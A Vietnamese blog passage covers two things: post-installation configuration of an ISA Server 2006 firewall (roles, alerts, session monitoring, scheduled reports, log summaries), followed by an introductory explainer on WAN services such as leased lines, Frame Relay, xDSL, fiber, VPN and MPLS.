Mặc định, quản trị cục bộ của máy được thiết lập như một ISA Server Enterprise Administrator. Bạn có thể thêm các user khác như các quản trị Enterprise, tuy nhiên phải lưu ý rằng vì ISA firewall không phải cấu kết miền nên các tài khoản sử dụng phải tồn tại trong chính bản thân ISA firewall. Enterprise còn là ISA Server Enterprise Auditor. Vai trò này cho phép các user quan sát thiết lập của toàn bộ enterprise cũng như thực hiện các nhiệm vụ kiểm tra giám sát, bao gồm tạo lập các tệp sổ ghi (log file) của ISA firewall, tạo lập Alert Definitions (xác định cảnh báo), và giám sát tất cả các lĩnh vực của Enterprise và mảng trong doanh nghiệp này.
Thiết lập thời gian cập nhật chính sách CSS
Chính sách và cấu hình ISA firewall cho hệ thống ISA Enterprise không được lưu giữ trong cục bộ phần đăng ký mà được lưu giữ ở bộ nhớ cấu hình (CSS). CSS được kiểm tra dựa trên những thay đổi định kỳ cơ bản đối với chính sách và cấu hình firewall và những thay đổi này được áp dụng cho mảng. Bạn có thể thiết lập được khoảng kiểm tra vòng này bằng cách nhấp chuột phải vào tên của mảng nằm bên trái cửa số bảng điều khiển ISA firewall và ấn Properties. Trên hộp thoại Properties, nhấp chuột vào thẻ Configuration Storage. Thẻ này giống như trong bảng sau.
install-isa-unihome-5
Hình 5.

Trong thẻ Configuration Storage bạn cài đặt khoảng kiểm tra vòng. Giá trị mặc định là 15 giây. Bạn có thế thay đổi giá trị khoảng thời gian đến 10 phút, 60 phút hoặc tùy biến (Custom) (giây) bằng tay. Chú ý khoảng thời gian càng dài thì sẽ càng mất nhiều thời gian thay đổi để phân phối từ CSS đến chính sách hoạt động firewall.


Gán vai trò của Array

Array roles khác biệt so với enterprise roles. Những tài khoản người dùng được gán tới vai trò Enterprise roles có thể có những ưu thế của các vai trò này đối với tất cả các mảng trong enterprise. Ngược lại, các vai trò được gán ở cấp độ arrray áp dụng chỉ cho mảng cụ thể. Các tùy chọn vai trò Array này hơi khác biệt so với những gì bạn thấy ở cấp độ Enterprise. Trong hộp thoại Properties, nhấp chuột vào thẻ Assign Roles để gán vai trò mảng.
install-isa-unihome-6
Hình 6.

Chú ý không có bất cứ một user mặc định được gán với bất cứ vai trò nào ở cấp độ mảng. Có 3 vai trò mảng: ISA Server Array Administrator (tương tự vai trò của enterprise administrator), ISA Server Array Auditor (cho phép người dùng quan sát các biểu đồ ISA Server traffic logs), và ISA Server Array Monitoring Auditor (cho phép người dùng hiển thị các đặc quyền trên toàn bộ mảng bao gồm enterprise và các firewall policy rule.


Thiết lập Alert Definitions

ISA firewall bao gồm hàng tá cảnh báo trước cài đặt. Những cảnh báo này được kích hoạt khi dò thấy các thông số cảnh báo. Tuy nhiên trạng thái cảnh báo có thể được điều chỉnh tùy theo những yêu cầu riêng của bạn.

Để thiết lập Alert Definitions, nhấp chuột vào Monitoring nằm bên trái cửa sổ bảng điều chỉnh. Sau đó nhấp chuột chọn thẻ Alerts ở giữa cửa sổ bảng điều chỉnh. Chọn thẻ Tasks trong Task Pane rồi nhấp chuột vào Configure Alert Definitions link. Bạn sẽ thấy xuất hiện bảng giống như hình sau.
install-isa-unihome-7
Hình 7.

Trong hộp thoại Alerts properties có một danh sách tất cả các cảnh báo có sẵn ở ISA firewall. Mỗi cảnh báo này được thiết lập mặc định và bạn có thể sử dụng ngay ngoài hộp thoại, hoặc bạn cũng có thể tùy chỉnh thiết lập mặc định. Bạn cũng có thể tạo những cảnh báo mới dựa trên các cảnh báo thích hợp nhưng việc kích hoạt dựa trên các thông số sự kiện khác nhau có những tác động khác nhau.

Nhấn đúp chuột vào một trong các cảnh báo và bạn sẽ thấy xuất hiện bảng giống như bảng sau. Trên thẻ General trong hộp thoại Properties của cảnh báo, bạn sẽ thấy những mô tả của cảnh báo, loại cảnh báo, và mức độ nghiêm trọng mặc định của nó. Đánh dấu chọn Enable nếu muốn kích hoạt cảnh báo.
install-isa-unihome-8
Hình 8.

Chọn thẻ Events và bạn sẽ thấy các thông số mặc định cần có để có thể kích hoạt cảnh báo. Bạn có thể thay đổi các thông số kích hoạt tại đây. Bạn cũng có thể quyết định việc cảnh báo chỉ được kích hoạt khi một server cụ thể nào đó trong mảng bị tác động.
install-isa-unihome-9
Hình 9.

Chọn thẻ Actions. Ở đây bạn có thể thiết lập cảnh báo để gửi một thông báo, chạy một chương trình, hoặc ngừng hay khởi động Windows trong trường hợp cảnh báo được kích hoạt dựa trên những thiết lập trước trên thẻ Events.
install-isa-unihome-10
Hình 10.

Mức độ bao quát, bảo vệ cụ thể của tất cả các cảnh báo trong ISA firewall alerts cũng như cách thiết lập và tạo mới các cảnh báo nằm ngoài phạm vi của bài viết này. Trong tương lai vấn đề này chắc chắn sẽ được đề cập chi tiết trong cuốn sách ISA Server 2006.


Thay đổi Column Order trong Sessions Monitor

ISA firewalls session monitor (bộ giám sát phiên hoạt động của ISA firewall) cho thấy những máy có phiên đang hoạt động ISA firewall trong chế độ thời gian thực. Mặc định, các cột được sắp xếp không theo thứ tự để tránh việc “dòm ngó” thông tin. Sự cố này có thể khắc phục được bằng cách sắp xếp lại các cột. Ngoài ra, bạn cũng có thể thêm một cột mang lại một lượng lớn thông tin có giá trị.

Chọn thẻ Sessions, sau đó nhấp chuột chọn mục Add/Remove Columns.
install-isa-unihome-11
Hình 11.

Trong hộp thoại Add/Remove Columns, chọn mục Application Name trong Available columns list và chọn Add. Mục này mang lại các thông tin giá trị về những ứng dụng mà user đang sử dụng để tiếp cận nguồn tài nguyên qua ISA firewall. Thông qua thông tin này bạn có thể kiểm tra những ứng dụng chưa xác định đã được sử dụng để kết nối các nguồn tài nguyên liên mạng. Sau đó bạn có thể ngừng kết nối làm việc trong thời gian xử lý thông tin. Lưu ý cách này chỉ dùng được khi bạn triển khai Firewall client trong tổ chức đúng cách.

Bạn có thể dùng phím Move Up và Move Down để thay đổi thứ tự columns (như bảng sau). Ấn OK sau khi thay đổi.

install-isa-unihome-12
Hình 12.


Thiết lập Recurring Report Jobs

Thứ mà các ông chủ thường yêu cầu chính là các báo cáo. Các ISA firewall report cung cấp những thông tin khách quan về những gì ISA firewall đã và đang bảo vệ cũng như quản lý lưu thông mạng cho tổ chức. Với lý do này bạn nên lập kế lịch report jobs hoạt động thường xuyên và việc quản lý nhờ đó mà trở nên dễ dàng hơn.

Chọn thẻ Reports ở giữa cửa sổ bảng điều khiển. Chọn thẻ Tasks trên khung Task Pane và bạn sẽ thấy xuất hiện một loạt tùy chọn có sẵn để tạo lập và thiết lập cấu hình báo cáo. Thực hiện theo các bước sau để tạo lập một recurring report job:
1. Ở thẻ Tasks trên khung Task Pane, nhấp chuột vào link Create and Configure Report Jobs. Đường dẫn này cho phép bạn tạo lập một recurring report job. Link Generate a New Report giúp bạn tạo lập một Ad Hoc report.
install-isa-unihome-13
Hình 13.

2. Ở trang Welcome to the New Report Job Wizard, nhập một tên cho report trong hộp Report Job name. Ở ví dụ này chúng ta sẽ tạo một report thực hiện một lần một tuần, vì vậy sẽ được đặt tên là Weekly Report. Sau đó ấn Next.
install-isa-unihome-14
Hình 14.

3. Ở trang Report Content, chọn nội dung bạn muốn có trong bản report. Càng nhiều càng tốt, vì vậy nên lựa chọn tất cả các tùy chọn (thiết lập mặc định). Ấn Next.
install-isa-unihome-15
Hình 15.

4. Ở trang Report Job Schedule, lựa chọn tần xuất cho bản báo cáo. Có các lựa chọn như Daily (hàng ngày), Weekly (hàng tuần), on specified days (những ngày đặc biệt) và Monthly (hàng tháng), on this date every month (ngày này hang tháng). Lưu ý theo mặc định, report jobs được thực hiện vào lúc 1:00AM (0100h). Ở ví dụ này chúng ta muốn thực hiện một report job hang tuần vì vậy sẽ chọn tùy chọn Weekly, on specified days. Bạn cũng có thể chọn ngày trong tuần mà bạn muốn report được thực hiện. Ví dụ như chọn Saturday. Ấn Next.
install-isa-unihome-16
Hình 16.

5. Ở trang Report Publishing, bạn có tuỳ chọn xuất bản báo cáo cho local directory hay a network share. Các báo cáo được lưu giữ dưới dạng file HTML có thể đọc được với bất kỳ Web browser nào. Nhập địa chỉ nơi bạn muốn các báo cáo được thông báo đến và các thông tin người dùng yêu cầu để truy cập hệ thống chia sẻ. Tránh xuất bản các báo cáo ngay tại ISA firewall khi bạn không muốn cho phép các liên kết tới ISA firewall. Ấn Next.
install-isa-unihome-17
Hình 17.

6. Ở trang Send E-mail Notification, tùy chọn gửi thông báo thư điện tử khi bản báo cáo được tạo lập. Nhập địa chỉ server SMTP, the From and To e-mail addresses (địa chỉ gửi và nhận), và một nội dung tin ngắn. Bạn cũng có thể nhập một đường link tới bản report đã được thông báo. Nhấp chuột vào Test để xác nhận việc kết nối với e-mail server của bạn.
install-isa-unihome-18
Hình 18.

7. Chọn Finish trong trang Completing the New Report Job Wizard.
8. Hộp thoại Report Jobs Properties thông báo bạn đã tạo lập báo cáo.
install-isa-unihome-19
Hình 19.

Tùy chỉnh báo cáo
ISA firewalls reports có thể được thay đổi theo một phạm vi nhất định. Khi tạo lập được các báo cáo chuyên sâu về một hoạt động cụ thể nào đó của người dùng, bạn có thể thay đổi mẫu thông tin trong các report.


Bạn có thể tùy chỉnh các report sau:


1. Summary Content reports

2. Web Usage reports

3. Application Usage reports

4. Traffic and Utilization reports

5. Security Content reports
Xem các tùy chọn trong bảng sau.
install-isa-unihome-20
Hình 20.

Nhấp chuột vào Customize Web Usage Content link và bạn sẽ thấy xuất hiện bảng giống bảng sau. Mỗi tùy chọn sửa đổi report lại có những tính năng sửa đổi khác nhau. Trong bảng dưới đây, chọn thẻ Top Users. Ở đây bạn có thể thiết lập số lượng user xuất hiện và thứ tự sắp xếp trong báo cáo. Những tùy chọn sửa đổi tương tự cũng có thể ứng dụng cho các báo cáo khác. Hãy xem xét kỹ từng cách sửa đổi báo cáo và chọn những cách phù hợp với yêu cầu của bạn nhất.
install-isa-unihome-21
Hình 21.


Thiết lập Log Summary và Report Preferences

Đồng thời với việc thiết lập và tùy chỉnh các bản báo cáo đã được lập lịch, bạn có thể muốn thiết lập các tùy chọn tóm lược nhật ký máy và các báo cáo về trạng thái, hoạt động lưu trữ. Ở thẻ Tasks trên khung Task Pane, nhấp chuột vào đường link Configure Log Summary and Report Preferences như trong bảng sau.
install-isa-unihome-22
Hình 22.

Trong hộp thoại Log Summary and Report Properties, chọn thẻ Log Summary, xuất hiện bảng giống bảng sau. Theo mặc định, các log summary được tạo hàng ngày vào lúc 12:30AM (theo giờ địa phương). Các thông tin được dùng để lập các bản báo cáo được giữ ở các log summary, vì thế không thể có một bản báo cáo dựa vào một dữ liệu riêng trừ khi log summary của ngày đó đã có sẵn. Lưu ý những bản log summary dựa trên những thông tin trong ISA firewalls log files. Tuy nhiên, một khi bản được tạo trên các log files thì không còn cần các log files hiện thời để tạo một báo cáo cho ngày đó.
Vị trí mặc định cho log summary là ở thư mục ISA Server 2004, trong thư mục ISASummaries. Có thể chuyển vị trí bằng cách chọn tùy chọn This folder, tuy nhiên bạn không thể sử dụng ổ đĩa mạng hay thư mục chia sẻ cho nó. Cũng có thể thiết lập một lượng các log summary bạn muốn giữ. Các giá trị mặc định là 35 Daily summaries và 13 Monthly. Có thể để 365 daily và 48 monthly.
install-isa-unihome-23
Hình 23.

Chọn thẻ Report Storage. Đây là tính năng mới trong ISA Server 2006. Ở đây bạn có thể đặt lượng các báo cáo mỗi kỳ được lưu trong từng ổ cứng riêng. Giá trị mặc định là 30. Tùy theo dung lượng của ổ cứng của bạn, có thể chuyển sang 365 nếu không muốn thực hiện lại các báo cáo.

install-isa-unihome-24
Hình 24.


Kết luận

Bài viết này đề cập tới một số tùy chọn thiết lập cấu hình cơ bản sau cài đặt. Chúng có thể ứng dụng được đối với từng mảng đơn unihomed Web proxy cấu kết lẻ thiết lập ISA firewall. Khi phần lớn áp dụng cho các kiểu triển khai ISA firewall khác, các tùy chọn thiết lập cấu hình trong bài viết này không phản ánh một danh sách đầy đủ cho các bản khác. Ở bài viết tiếp theo trong loạt bài về vấn đề này, chúng tôi sẽ tiếp tục đi sâu về những tùy chọn thiết lập cấu hình sau khi cài đặt mà không đề cập tới ở đây.

Chuyên mục:Computer-Internet

Các Dịch Vụ WAN Thông Dụng

 

1 Giới thiệu
Ngày nay network đã trở thành một một phần trong cuộc sống hằng ngày của rất nhiều người, chúng ta (dân network) sử dụng network cho giải trí, khai thác network cho công việc, kinh doanh, kiếm tiền trên network…Chính vì sự phổ biến và phát triển rất nhanh của network làm cho chúng ta có điều kiện tiếp cận các công nghệ mới, hiện đại và giá thành rẻ hơn. Nhưng cũng chính vì vậy mà có rất nhiều khái niệm rất cơ bản về network mà chúng ta chưa hiểu rõ và đúng về nó.
Trong bài viết này em sẽ trình bày các khái niệm về dịch vụ truyền dữ liệu WAN như Internet, site-to-site, xDSL, Fiber, Leased line, VPN, Megawan. Bài viết dựa trên kiến thức hạn hẹp của em và các tài liệu tham khảo từ internet và chỉ dừng lại tại mức độ người sử dụng dịch vụ, không đi sâu vào chi tiết kỹ thuật. Tất nhiên bài viết không thể tránh khỏi các sai sót, các bác thảo luận thêm.
Bài viết có tham khảo và trích đoạn từ các site:
http://www.vnpt.com.vn
http://vdc.com.vn
http://www.hcmtelecom.vn
http://vi.wikipedia.org
http://www.tapchibcvt.gov.vn

2 Khái niệm LAN (Local Area Network)
Từ những những ngày đầu phát triển Network, vì những giới hạn về công nghệ và để giảm giá thành nên người ta sử dụng dây dẫn kim loại và tín hiệu điện để truyền dữ liệu giữa các thiết bị. Các bạn đã biết, tín diệu điện khi truyền trên dây dẫn kim loại luôn có hiện tượng suy giảm nên các thiết bị mạng chỉ có thể truyên tín hiệu chính xác trong một khoảng cách nhất định. Tất nhiên người ta có thể chế tạo các thiết bị truyền tín hiệu với khoảng cách hàng chục thậm chí hàng trăm kilomet! Nhưng điều này có thực sự cần thiết không vì làm như vậy thì các thiết bị mạng sẽ rất đắt tiền. Thực tế tại thời điểm đó hoàn toàn không có nhu cầu này (nối các PC cách xa hàng trăm Km). Vậy khoảng cách bao xa là đủ? Đây là một câu hỏi không thể trả lời chính xác được mà chỉ có thể trả lời bằng nhu cầu thực tế.
Khi các thiết bị sẽ được bố trí trong một tòa nhà vậy khoảng cách tối đa 200m có đủ không? -trả lời đủ với tòa nhà không quá lớn
Vậy khi có nhu cầu lớn hơn thì sao? trả lời vậy thì 500m?
Và người ta đã đưa ra nhiều loại thiết bị mạng có chuẩn gửi dữ liệu khác nhau (10base2_khoảng cách tối đa 185m hay 10base5_khoảng cách tối đa 500m…). Tuy nhiên, trên thực tế với chều dài 200m cũng khá lớn (lớn hơn tòa nhà cao nhất Sài Gòn ngày nay!) và đủ dùng cho hầu hết các trường hợp nên chuẩn 10base5 đã đi vào quá khứ.
Ngày nay chúng ta vẫn dùng phổ biến cable UTP cho mạng nội bộ. Chuẩn 10baseT, 100baseT cũng có giới hạn khoảng cách từ PC đến SW/HUB là 100m hoặc dùng các AP thông thường cho wireless cũng nằm trong khoảng cách này.
Mạng LAN có thể hiểu là một hệ thống mạng với các thiết bị nằm trong một khoảng cách giới hạn (vài trăm mét) và các thiết bị truyền dữ liệu trong mạng LAN thuộc về Cty/cá nhân sở hữu mạng LAN đó!

3 Khái niệm WAN (Wide Area Network)
Lợi ích lớn nhất của network chính là việc tiết kiệm thời gian gửi dữ liệu, với hệ thống mạng LAN đang có thì chúng ta có thể tiết kiệm thời gian khi gửi dữ liệu giữa các thiết bị “gần” nhau. Nhưng trong trường hợp Cty của bạn cho 2 chi nhánh ở Sài Gòn và Hà Nội thì việc gửi dữ liệu giữa các chi nhánh này vẫn phải dùng dịch vụ bưu chính truyền thống!
Nhu cầu cấp thiết là xây dụng một hệ thống mạng nối các thành phố lớn với nhau và dần dần là nối cả thế giới với nhau, muốn vậy người ta phải cho ra đời các thiết bị hoàn toàn mới, có khả năng gửi dữ liệu với khoảng cách từ xa cho đến rất xa, có thể vài Km đến vài trăm Km hay đến cả một vòng trái đất. Nói chung các thiết bị này có thể gửi dữ liệu xa hơn nhiều lần các thiết bị LAN. Các thiết bị này gọi là thiếtbị WAN.
Quay lại với trường hợp Cty bạn có 2 chi nhánh ở Sài Gòn và Hà Nội thì Cty bạn có phải mua hơn 1700 Km dây và hàng đống các thiết bị WAN để nối mạng không? Chắc chắn là một Cty bình thường sẽ không bao giờ có đủ chi phí để thực hiện việc này. Nó quá khó và tốn kém thế nên tốt hơn là chúng ta nên đi thuê. Và từ nhu cầu này đã hình thành các Cty chuyên đầu tư cơ sở hạ tầng. Họ đầu tư với chi phí rất lớn và thu lợi bằng cách cho các Cty khác thuê lại cơ sở hạ tầng mạng. Các Cty cho thuê gọi là ISP (Internet Services Provider) các Cty thuê là khách hàng, chính là chúng ta, người sử dụng dịch vụ. Mạng WAN khác mạng LAN ở chỗ chúng ta đi thuê cơ sở hạng tầng mạng từ ISP còn mạng LAN thì chúng ta tự đầu tư.
Khi sử dụng dịch vụ WAN, có hai khái niệm cần phân biệt là và SITE-to-SITEINTERNET.

3.1 SITE-to-SITE Truyền thống:
Trong trường hợp trên, khi một Cty có hai hoặc nhiều chi nhánh cách xa nhau và cần nối mạng với nhau, lúc đó ta sử dụng cơ sở hạ tầng mạng của ISP để gửi dữ liệu giữa các chi nhánh, dịch vụ này gọi chung là site-to-site. Dịch vụ site-to-site mang tính chất riêng tư (private), các thiết bị mạng trong trường hợp này đề sử dụng các dãy địa chỉ private và chỉ có các thiết bị giữa các site liên lạc được với nhau mà thôi. Tùy theo nhu cầu của khách hàng, ISP đưa ra kỹ thuật-dịch vụ khác nhau với giá thành/chất lượng khác nhau để khách hàng lựa chọn.

3.1.1 Dịch vụ kênh thuê riêng (Leased Line)
Dịch vụ kênh thuê riêng là dịch vụ cho thuê kênh truyền dẫn vật lý dùng riêng để kết nối và truyền thông tin giữa các thiết bị đầu cuối, mạng nội bộ, mạng viễn thông dùng riêng của khách hàng tại hai địa điểm cố định khác nhau.
Các đặc điểm của Dịch vụ kênh thuê riêng:
Tính bảo mật, và tính sẵn sàng cao (do không phải chia sẻ đường truyền)
Chi phí thuê sử dụng dịch vụ cố định hàng tháng.
Toàn quyền sử dụng kênh liên lạc liên tục 24 giờ/ngày, 7 ngày/tuần.
Chất lượng đảm bảo tiêu chuẩn quốc tế
Truyền dẫn theo thời gian thực, không bị trễ
Tốc độ đáp ứng các yêu cầu của khách hàng.
Nhược điểm lớn nhất của Dịch vụ kênh thuê riêng là đắt tiền. Lý do chính khiến cho Dịch vụ kênh thuê riêng rất đắt là mỗi khách hành sử dụng một kênh truyền riêng, không chia sẻ với các khách hàng khác và hầu như tất cả các khách hàng đều không thể khai thác hết công suất kênh thuê bao riêng.

3.1.2 Frame relay (Packet switching)
Với nhu cầu ngày càng lớn của các khách hàng cần một kết nối site-to-site giá rẻ hơn leased line, người ta đưa ra một kỹ thuật được gọi là Packet switching. ISP cho các khách hàng dùng chung cơ sở hạ tầng mạng để gửi dữ liệu, để phân loại dữ liệu của các khách hàng, phía ISP sẽ đánh số vào các gói tin cho mỗi khách hàng khác nhau, sau đó dựa vào số này (DLCI) ISP sẽ gửi các gói tin đến site mà khách hàng cần kết nối. Với cách này phía ISP sẽ khai thác công suất của cơ sở hạ tầng mạng hiệu quả hơn và kết quả là các khách hàng có một dịch vụ site-to-site rẻ hơn leased-line. Frame-relay là một trong các chuẩn sử dụng kỹ thuật packet switching.
Frame Relay là dịch vụ truyền số liệu mạng diện rộng liệu theo phương thức chuyển mạch khung với tốc độ cao, tạo ra băng thông lớn thích hợp với các ứng dụng phức tạp đòi hỏi tốc độ lớn và dung lượng truyền tin cao. Frame Relay thích hợp cho các khách hàng có nhu cầu kết nối các mạng diện rộng và sử dụng các ứng dụng riêng với tốc độ kết nối cao (băng thông tối đa là 44,736 Mbit/s) và phục vụ cho các ứng dụng phức tạp như tiếng nói, âm thanh, hình ảnh.
Lợi ích mang lại cho khách hàng:
Frame Relay đảm bảo chất lượng dịch vụ cung cấp, tiết kiệm chi phí về thiết bị, chi phí sử dụng. Đơn giản, tiết kiệm, linh hoạt trong nâng cấp, Frame Relay nâng cao hiệu quả sử dụng mạng và phạm vi cung cấp dịch vụ rộng.
Frame Relay đảm bảo chất lượng dịch vụ cung cấp: Bằng khả năng cung cấp tốc độ truyền thông cam kết CIR (Commited Information Rate – Tốc độ truyền thông dữ liệu tối thiểu được cam kết bởi nhà cung cấp dịch vụ), Frame Relay cho phép khách hàng đảm bảo và kiểm soát chất lượng dịch được cung cấp.
Tiết kiệm chi phí về thiết bị: Cho phép thiết lập nhiều đường kết nối ảo thông qua một kênh vật lý duy nhất, điều này làm giảm thiểu chi phí thiết bị so với hệ thống mạng dùng các kênh kết nối trực tiếp
Tiết kiệm chi phí sử dụng
Với nhiều tốc độ CIR cung cấp khách hàng hoàn toàn có thể điều chỉnh chi phí sử dụng mạng thích hợp nhất với nhu cầu trao đổi dữ liệu của mình.
Đơn giản, tiết kiệm, linh hoạt trong nâng cấp
Frame Relay nâng cao hiệu quả sử dụng mạng: Frame Relay cho phép tích hợp nhiều ứng dụng khác nhau sử dụng các công nghệ truyền thông khác nhau trên một mạng lưới duy nhất (Voice, Data, Video,…). Frame Relay hỗ trợ khả năng tích hợp và tương thích với các tiêu chuẩn kỹ thuật khác nhau(X25, TCP/IP, SNA, ATM….)
Cung cấp khả năng quản lý mạng và bảo mật an toàn mạng lưới
Phạm vi cung cấp dịch vụ rộng, giao dịch cung cấp dịch vụ trên toàn quốc.
Khả năng sử dụng dịch vụ: Trong nước và quốc tế
Nhược điểm so với leased-line là độ bảo mật kém hơn và tốc độ truyền dữ liệu được giới hạn trong một khoảng min và max chứ không cố định như leased-line.

3.1.3 Dịch vụ quay số điện thoại (PSTN)
Trong một số trường hợp các site nằm trong các khu vực không thể tiếp cận với cơ sở hạ tầng của ISP (vùng sâu, vùng xa…) thì ta có thể dùng đường truyền điện thoại để gửi dữ liệu. Vì đường truyên điện thoại PSTN chỉ có khả năng gửi tín hiệu âm thanh do đó tại các site phải có các thiết bị chuyển đổi tín hiệu số thành tín hiệu âm thanh và ngược lại. Việc chuyển đổi này không thể thực hiện với tốc độ cao được vì đường truyền điện thoại có chất lượng âm thanh khá thấp. Hoạt động của các thiết bị này (modem) bị giới hạn ở mức 56Kbps. Với tốc độ này nên ngày nay chúng ta ít sử dụng kiểu quay số điện thoại cho việc gửi dữ liệu.

3.2 INTERNET
Là một hệ thống mạng toàn cầu, mang tính chất công cộng (public), các tài nguyên được chia sẻ và dùng chung. Để có được kết nối internet chúng ta cần một đường truyền vật lý từ nhà hoặc VP Cty kết nối đến trụ sở ISP. Khoảng cách này thông thường không quá xa (khoảng vài Km) nhưng cũng vượt quá tầm hoạt động của thiết bị LAN do đó vẫn phải dùng các thiết bị WAN. Để phổ cập internet nên các thiết bị dùng để kết nối INTERNET phải có giá thành hợp lý
Các dịch vụ internet thông dụng: (Trong phần này Em lấy các dịch vụ của VNN để làm ví dụ)

3.2.1 INTERNET thông qua đường truyền điện thoại PSTN
Giống trong trường hợp 3.1.3, chúng ta có thể dùng line điện thoại để gửi dữ liệu từ VP, nhà đến trụ sở ISP, tại ISP họ có các đường truyền chuyên dụng để hòa mạng quốc tế, gọi là các cổng internet.
Ưu điểm: Rẻ, đáp ứng được tại bất cứ nơi nào có đường truyền điện thoại cố định
Nhược điểm: vì phải chuyển đổi qua tín hiệu âm thanh và gửi trên đường truyền điện thoại nên tốc độ chậm (56Kbps)

3.2.2 Dịch vụ Internet trực tiếp (leased line internet)
Trong trường hợp cần một đường truyền internet tốc độ cao và ổn định thì chúng ta có thể sử dụng các thiết bị như mục 3.1.1. Các thiết bị này dùng để kết nối từ VP Cty đến ISP, trường hợp này gọi là leased-line internet.
Ưu điểm:
Tốc độ không giới hạn: Kết nối Internet trên đường truyền cáp quang hoặc cáp đồng, với tốc độ từ 64Kbps tới hàng chục Gbps
Riêng biệt & trực tiếp: Kết nối trực tiếp vào cổng Internet quốc gia bằng kênh riêng vật lý, hoàn toàn không còn trễ và nghẽn mạng.
Rất ổn định: Với công nghệ đối xứng cho cả upload và download sẽ cho phép kết nối Internet liên tục và thông suốt 24/24
Bảo mật: Kênh truyền dẫn riêng biệt sẽ giúp giảm thiểu các tấn công và xâm nhập vào mạng dữ liệu của bạn qua Internet.
Linh hoạt về băng thông trong nước và quốc tế: Ngoài việc kết nối Internet ra cổng quốc tế như cam kết, khách hàng có thể truy nhập Internet trong nước với mọi tốc độ, tùy thuộc yêu cầu của khách hàng.
Nhược điểm giống như 3.1.1 là rất đắt tiền

3.2.3 Dịch vụ X_DSL:
Vậy để có thể kết nối vào hệ thống mạng internet, các khách hàng chỉ cần đườn truyền vật lý nối từ VP đến trụ sở ISP, khoảng cách này thông thường khoảng vài Km. Nếu dùng dịch vụ 3.2.1 thì tốc độ truyền dữ liệu quá chậm còn dùng d/v 3.2.2 thì quá đắt! Với nhu cầu ngày càng nhiều nên người ta phát triển các công nghệ mới. Trên đường truyền điện thoại, tín hiệu thoại được gửi dưới dạng sóng analog, với kỹ thuật mới, người ta có thể gửi cùng trên một line điện thoại một dạng tín hiệu digital khác, kỹ thuật này gọi là DSL (Digital Subcriber Line)
Với công nghệ X_DSL, các ISP đã có được một cách phân phối internet đến các khách hàng với chi phí thấp. Tất nhiên công nghệ DSL chỉ có thể gửi dữ liệu trong phạm vi vài Km nên không thể ứng dụng trong trường hợp kết nối site-to-site với khoảng cách đến hàng ngàn Km.

3.2.4 Cáp quang (fiber):
Công nghệ ngày càng phát triển, người ta ngày càng không hài lòng với những gì đang có. Do việc sử dụng cable đồng còn nhiều nhược điểm (suy giảm tín hiệu, nhiễu, sét đánh…) người ta phát triển công nghệ cáp quang với các đặc điểm:
Internet FTTH(FTTH- Fiber to the home) là dịch vụ truy cập Internet hiện đại nhất với đường truyền dẫn hoàn toàn bằng cáp quang đến địa chỉ thuê bao.
Mạng cáp quang được đưa đến địa chỉ thuê bao giúp khách hàng sử dụng được đa dịch vụ trên mạng viễn thông chất lượng cao, kể cả dịch vụ truyền hình giải trí.
Internet FTTH thích hợp cho khách hàng cá nhân, tổ chức, doanh nghiệp.
Đường truyền có tốc độ ổn định; tốc độ truy cập Internet cao.
Không bị suy hao tín hiệu bởi nhiễu điện từ, thời tiết hay chiều dài cáp.
An toàn cho thiết bị, không sợ sét đánh lan truyền trên đường dây.
Nâng cấp băng thông dễ dàng mà không cần kéo cáp mới.

3.3 SITE-to-SITE “biến thể” ít ngon nhưng bổ, rẻ!!!

3.3.1 VPN: (Rẻ nhất, ít ngon nhất, bổ tùy theo trường hợp)
Nếu Cty Bạn có 2 site và mỗi site đã có đường truyền internet (ADSL) thì các thiết bị tại các site chỉ có thể truy xuất trực tiếp đến các Host trên internet (các host có địa chỉ public) mà thôi mặc dù xét về đường truyền vật lý thì các host đề có liên kết với nhau. Vấn đề nằm ở chỗ các thiết bị trong mạng LAN được đặt IP Private còn các thiết bị internet chỉ làm việc với địa chỉ Public. Chúng ta có thể tận dụng mạng internet (giá rẻ) để gửi dữ liệu riêng giữa các site bằng cách yêu cầu các router kết nối internet của 2 site “bắt tay” với nhau để chuyển giao dữ liệu mạng nội bộ thông qua vỏ bọc là địa chỉ public của chính các router đó. Kỹ thuật này gọi là VPN (Virtual Private Network)
Vì chẳng có một đơn vị nào đứng ra bảo đảm cho VPN hoạt động thông suốt nên độ tin cậy của VPN trong trường hợp này bằng không! Khả năng bảo mật cũng là vấn đề lớn nhưng ưu điểm lớn nhất là ta chỉ phải trả chi phí cho kết nối internet mà thôi, việc gửi dữ liệu giữa các site cũng tương tự việc gửi dữ liệu từ mạng LAN đến một thiết bị trên internet.

3.3.2 VPN có bảo kê: (Ngon hơn, giá vừa phải, bổ tùy theo trường hợp)
Khi các ISP đầu tư cơ sở hạ tầng mạng thì họ luôn nghĩ cách khai thác tối đa để thu lợi. Trong khi đó, nhu cầu nối mạng giữa các chi nhánh trong Cty (site-to-site) không ngừng tăng lên, leased-line site-to-site và frame-relay chưa tận dụng hết hiệu suất cơ sở hạ tầng mạng, do đó ISP đưa ra dịch vụ mới (trên nền ý tưởng cũ là packet switching). Các chi nhánh trong Cty Bạn sẽ có một đường truyền tới ISP theo công nghệ giá rẻ X_DSL, nhưng dữ liệu của các chi nhánh này sẽ được ISP dẫn đường trên các thiết bị của họ để gửi đến các chi nhánh khác chứ không đi ra internet rồi mới tới các chi nhánh như 3.3.1 Việc gửi dữ liệu này do ISP kiểm soát nên họ có thể điều khiển tốc độ gửi và có vẻ an toàn hơn 3.3.1. Để gửi và nhận dữ liệu với tốc độ bằng nhau, người ta thường dùng chuần SH_DSL. Với nhà cung cấp dịch vụ VNN, dịch vụ này có tên thương mại là MEGAWAN Công nghệ gửi các gói tin trong trường hợp này thường được các ISP quảng bá nhiều do mục đích cạnh tranh trong kinh doanh. MPLS là thuật ngữ viết tắt cho Multi-Protocol Label Switching (chuyển mạch nhãn đa giao thức). Nguyên tắc cơ bản của MPLS là thay đổi các thiết bị lớp 2 trong mạng như các thiết bị chuyển mạch ATM thành các LSR (label-switching router-Bộ định tuyến chuyển mạch nhãn). LSR có thể được xem như một sự kết hợp giữa hệ thống chuyển mạch ATM với các bộ định tuyến truyền thống. Xem thêm MPLS

4 Lời kết
Khi nói đến dịch vụ WAN, có hai nhu cầu các bạn cần tách biệt rõ vì chúng khác nhau hoàn toàn là SITE-to-SITE INTERNET

Site-to-site: mang tính chất private, các thiết bị được gán địa chỉ private và liên lạc nội bộ với nhau. Trường hợp này được dùng nhiều trong các Cty có nhiều chi nhánh (site) cần kết nối với nhau.

